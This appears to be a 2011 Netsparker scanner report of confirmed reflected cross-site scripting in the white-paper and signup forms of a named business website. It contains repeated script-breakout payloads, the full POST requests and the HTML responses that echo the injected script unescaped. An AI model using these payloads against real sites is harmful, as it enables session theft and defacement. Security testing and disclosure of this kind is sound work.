email POST netsparker@example.com
firstName POST Smith
iusrc POST '"--></style></script><script>alert(0x00045F)</script>
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00045F)%3c%2fscript%3e&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:56 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=5B13041B61AC1A066DBD076214A79EFB; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST '"--></style></script><script>alert(0x000472)</script>
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 225
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000472)%3c%2fscript%3e&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:03 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DAEFBAB4A2D8F10743C2D4C4E69B6524; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST '"--></style></script><script>alert(0x000499)</script>
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000499)%3c%2fscript%3e&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:18 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=294AE1C227BA40E3436EFCBE59B0790A; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="'"--></style></script><script>netsparker(0x000499)</script>"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST '"--></style></script><script>alert(0x0004AB)</script>
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004AB)%3c%2fscript%3e&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=95092FFA8350006F73409A3543069D56; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="'"--></style></script><script>netsparker(0x0004AB)</script>"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST '"--></style></script><script>alert(0x0004B5)</script>
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 323
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004B5)%3c%2fscript%3e&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:30 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=41211F516C1BD275CE97020CCF8C6874; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST '"--></style></script><script>alert(0x0004C8)</script>
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 304
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004C8)%3c%2fscript%3e&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:40 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=1BDF420E3D5491B24D688935D0B0644A; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST '"--></style></script><script>alert(0x0004C7)</script>
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
